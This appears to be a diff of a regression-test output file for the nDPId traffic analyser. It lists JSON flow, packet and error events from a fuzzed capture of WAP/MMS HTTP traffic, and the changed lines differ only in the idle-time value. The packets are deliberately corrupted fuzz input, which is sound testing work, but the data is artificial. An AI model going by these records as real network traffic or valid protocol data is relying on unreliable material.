0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vUmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIiVzAC0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IEQlcwB1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtJj48cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} 
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854543322} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854543315,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
-00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1031854546078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546078,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMpAAEAGF8usFAMNrBQDBQBQCk\/KbXJb5PFjPFAQgyw++QAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546079,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546079,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMtAAEAGF8qsNAMNrBQDBQBQCC3KbXJb5PFjPFARuSw++AAA"} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1031854543322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854543322,"pkt":"CAAgsiVzAFCLk5N8CABFAAAoLktAAIAGbkqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546078,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546078,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMpAAEAGF8usFAMNrBQDBQBQCk\/KbXJb5PFjPFAQgyw++QAA"} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854546079,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854546079,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMtAAEAGF8qsNAMNrBQDBQBQCC3KbXJb5PFjPFARuSw++AAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAsNUtAAIAGZ0asFAMFrBQDDQouAFDlQWz1AAAAAGACIADjNgAAAgQFtAAA"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854557802,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMxAAEAGF8WsFAMNrBQDBQBQCi7KxfhE5UFs9mASgyyW7gAAAgQFtA=="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854557802,"pkt":"CAAgsl17AFCLk5N8CABFAAAoNktAAIAGZkqsFAMFrBQDDQouAFDlQWz2ysX4RVAQIjgPoAAAAgQFtAAA"} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854557802,"flow_last_seen":1031854557802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854557802,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} 00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854557899} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":91,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854557803,"pkt":"AFCLk5N8kgAgsl2cCAAlcwAoxM5AAEAGF8esFAMNrBQDBQB+Ci7KxfhF5UF0EVAQgyynkAAA"} 
-00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 